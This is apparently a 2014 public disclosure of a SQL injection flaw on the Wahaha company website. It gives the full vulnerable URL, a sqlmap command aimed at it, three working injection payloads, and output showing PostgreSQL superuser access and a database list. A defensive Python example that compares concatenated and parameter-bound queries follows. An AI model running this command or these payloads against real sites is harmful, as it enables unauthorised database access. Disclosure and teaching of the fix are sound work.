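2014-12-26: Details have been reported to the vendor; awaiting vendor handling
2014-12-31: The vendor has actively ignored the vulnerability; details disclosed to the public
Wahaha website SQL injection vulnerability
Link: http://www.wahaha.com.cn/FSDownloadServlet?file_key=20140619074133653296.docx&file_name=2014年纸箱招标公告.docx
The file_key field is not filtered.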
sqlmap.py -u "http://www.wahaha.com.cn/FSDownloadServlet?file_key=20140619074133653296.docx&file_name=2014年纸箱招标公告.docx" --privilege --dbs
sqlmap identified the following injection points with a total of 288 HTTP(s) requests:
---
Parameter: file_key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: file_key=20140619074133653296.docx' AND 6103=6103 AND 'ZhCy'='ZhCy&file_name=2014骞寸焊绠辨嫑鏍囧叕鍛?docx

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries
    Payload: file_key=20140619074133653296.docx'; SELECT PG_SLEEP(5)--&file_name=2014骞寸焊绠辨嫑鏍囧叕鍛?docx

    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: file_key=20140619074133653296.docx' AND 5283=(SELECT 5283 FROM PG_SLEEP(5)) AND 'ovtB'='ovtB&file_name=2014骞寸焊绠辨嫑鏍囧叕鍛?docx
---
back-end DBMS: PostgreSQL
database management system users privileges:
[*] postgres (administrator) [3]:
    privilege: catupd
    privilege: createdb
    privilege: super

available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public
Restrict
Severity: No impact (ignored by vendor)
Ignored at: 2014-12-31 14:50
2015-01-04: Handled
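The unfiltered file_key lookup and a restricted form of it, as an added example that is not code from the report or from the affected site. It assumes the servlet builds its query by string concatenation; the table, the function names, the key format regex and the always-false probe are constructed for illustration, and SQLite stands in for the PostgreSQL back end.

```python
import re
import sqlite3

KEY = "20140619074133653296.docx"                       # sample key from the report
TRUE_PROBE = KEY + "' AND 6103=6103 AND 'ZhCy'='ZhCy"   # payload from the sqlmap output
FALSE_PROBE = KEY + "' AND 6103=6104 AND 'ZhCy'='ZhCy"  # constructed always-false twin

# Assumed key format, inferred from the single sample: digits, dot, extension.
FILE_KEY_RE = re.compile(r"[0-9]{1,32}\.[A-Za-z0-9]{1,8}")


def make_db():
    """Constructed one-row table; SQLite stands in for the PostgreSQL back end."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE files (file_key TEXT PRIMARY KEY, path TEXT)")
    db.execute("INSERT INTO files VALUES (?, ?)", (KEY, "/data/tender.docx"))
    return db


def lookup_concat(db, file_key):
    """'Before' form (assumed): the request value becomes part of the SQL text."""
    sql = "SELECT path FROM files WHERE file_key = '" + file_key + "'"
    return db.execute(sql).fetchone()


def lookup_bound(db, file_key):
    """Bound parameter: the value is compared as data and never parsed as SQL."""
    return db.execute(
        "SELECT path FROM files WHERE file_key = ?", (file_key,)
    ).fetchone()


def lookup_hardened(db, file_key):
    """Allowlist check first, then the bound query."""
    if not FILE_KEY_RE.fullmatch(file_key):
        raise ValueError("file_key rejected")
    return lookup_bound(db, file_key)


def oracle_visible(lookup, db):
    """True when the true/false probes get different answers (blind-SQLi signal)."""
    return lookup(db, TRUE_PROBE) != lookup(db, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", oracle_visible(lookup_concat, db))
    print("bound:       ", oracle_visible(lookup_bound, db))
```

Binding alone removes the true/false difference that the boolean-based test relies on; the allowlist additionally rejects the stacked and time-based payload shapes before any query runs.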